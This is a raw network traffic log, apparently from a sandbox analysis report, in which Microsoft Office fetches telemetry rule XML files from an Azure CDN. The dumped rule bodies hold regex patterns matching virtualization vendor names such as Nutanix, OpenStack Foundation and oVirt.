                                                                                                                                      2024-10-07 01:23:05 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      52192.168.2.44978713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:05 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:05 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                      ETag: "0x8DC582BA54DCC28"
                                                                                                                                      x-ms-request-id: cde3aec9-601e-0084-63e5-166b3f000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012305Z-1657d5bbd48p2j6x2quer0q028000000030000000000am59
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:05 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      53192.168.2.44978913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:06 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                      x-ms-request-id: 3a03d6b9-d01e-0066-52e9-16ea17000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012306Z-1657d5bbd482lxwq1dp2t1zwkc00000002k000000000bcf3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      54192.168.2.44979213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:06 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 472
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                      x-ms-request-id: d803a4ff-401e-0083-3904-17075c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012306Z-1657d5bbd48jwrqbupe3ktsx9w00000002wg00000000ukma
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:06 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      55192.168.2.44979013.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:06 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 477
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                      x-ms-request-id: 27cd2a1a-001e-0046-1b08-17da4b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012306Z-1657d5bbd48sdh4cyzadbb374800000002h000000000t061
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:06 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      56192.168.2.44979113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:06 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 419
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                      x-ms-request-id: 46a5aa72-701e-0032-6004-17a540000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012306Z-1657d5bbd48brl8we3nu8cxwgn000000034g000000008tyw
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      57192.168.2.44979313.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:06 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:06 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 468
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                      x-ms-request-id: b0fdb72d-401e-0015-37ce-160e8d000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012306Z-1657d5bbd48brl8we3nu8cxwgn000000034g000000008tyx
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:06 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      58192.168.2.44979413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 485
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                      x-ms-request-id: 8d3bec0a-601e-0070-32fe-16a0c9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48xlwdx82gahegw400000000320000000003nb3
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:07 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      59192.168.2.44979513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 411
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                      x-ms-request-id: 8d044b15-901e-00ac-3902-17b69e000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48wd55zet5pcra0cg00000002v00000000032qc
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:07 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      60192.168.2.44979613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 470
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                      x-ms-request-id: e72b6989-501e-005b-2b00-17d7f7000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48p2j6x2quer0q028000000031g000000005c6x
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:07 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      61192.168.2.44979713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:07 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:07 UTC470INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:07 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 427
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                      x-ms-request-id: 0377c3fc-101e-000b-65dc-165e5c000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012307Z-1657d5bbd48cpbzgkvtewk0wu000000002sg00000000rpmq
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
